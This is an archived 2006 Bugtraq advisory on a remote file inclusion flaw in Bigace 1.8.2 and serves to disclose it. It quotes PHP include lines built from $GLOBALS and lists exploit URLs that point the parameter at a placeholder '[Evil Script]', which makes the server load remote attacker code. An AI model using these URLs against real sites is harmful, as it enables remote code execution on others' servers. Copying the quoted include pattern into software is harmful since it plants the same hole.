Bigace 1.8.2 (GLOBALS) Remote File Inclusion

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Bigace 1.8.2 (GLOBALS) Remote File Inclusion
From: vampire_chiristof@xxxxxxxxx
Date: 26 Aug 2006 08:14:15 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Author : Vampire        

Location : Iran - Tehran

HomePage : http://www.hackerz.ir

Email : Vampire_chiristof[at]yahoo[dot]com

Critical Level : Dangerous

------------------------------------------------------------------------
---------------

Affected Software Description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Bigace

version : 1.8.2

URL : http://Bigace.sourceforge.net

------------------------------------------------------------------------
---------------

Vulnerability:

~~~~~~~~~~~~~

in download.cmd.php , admin.cmd.php , upload_form.php We Found Vulnerability 
Script

----------------------------------------admin.cmd.php-----------------------
---------------

....

<?php

            require_once($GLOBALS['_BIGACE']['DIR']['admin'].'styling.php');
            
require_once($GLOBALS['_BIGACE']['DIR']['admin'].'functions.inc.php');
            include_once($GLOBALS['_BIGACE']['DIR']['libs'].'io.inc.php');
            

?>

...
----------------------------------------download.cmd.php-----------------------
---------------
....

<?php

            include_once($GLOBALS['_BIGACE']['DIR']['libs'].'io.inc.php');
            

?>

...


----------------------------------------upload_form.php-----------------------
---------------
....

<?php

           
require_once($GLOBALS['_BIGACE']['DIR']['admin'].'include/mode_constants.php');
            

?>

...




----------------------------------------item_main.php-----------------------
---------------
....


<?php

          
require_once($GLOBALS['_BIGACE']['DIR']['admin'].'include/mode_constants.php');



?>

...



Exploit:

~~~~~~~


http://www.target.com/[Bigace]/system/admin/include/item_main.php?GLOBALS=[Evil 
Script]

http://www.target.com/[Bigace]/system/admin/include/upload_form.php?GLOBALS=[Evil
 Script]

http://www.target.com/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil 
Script]

http://www.target.com/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil 
Script]

http://www.target.com/[Bigace]/system/command/admin.cmd.php?GLOBALS=[Evil 
Script]

Solution:

~~~~~~~~

Sanitize Variabel $GLOBALS in download.cmd.php , admin.cmd.php , item_main.php 
, upload_form.php

------------------------------------------------------------------------
----------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friends Cephexin , Sh3ll , MFOX , Alijbs and All 
Real Hackers

Prev by Date: Jupiter CMS 1.1.5 index.php Remote File Include
Next by Date: [ GLSA 200608-24 ] AlsaPlayer: Multiple buffer overflows
Previous by thread: Re: Jupiter CMS 1.1.5 index.php Remote File Include
Next by thread: [ GLSA 200608-24 ] AlsaPlayer: Multiple buffer overflows
Index(es):
- Date
- Thread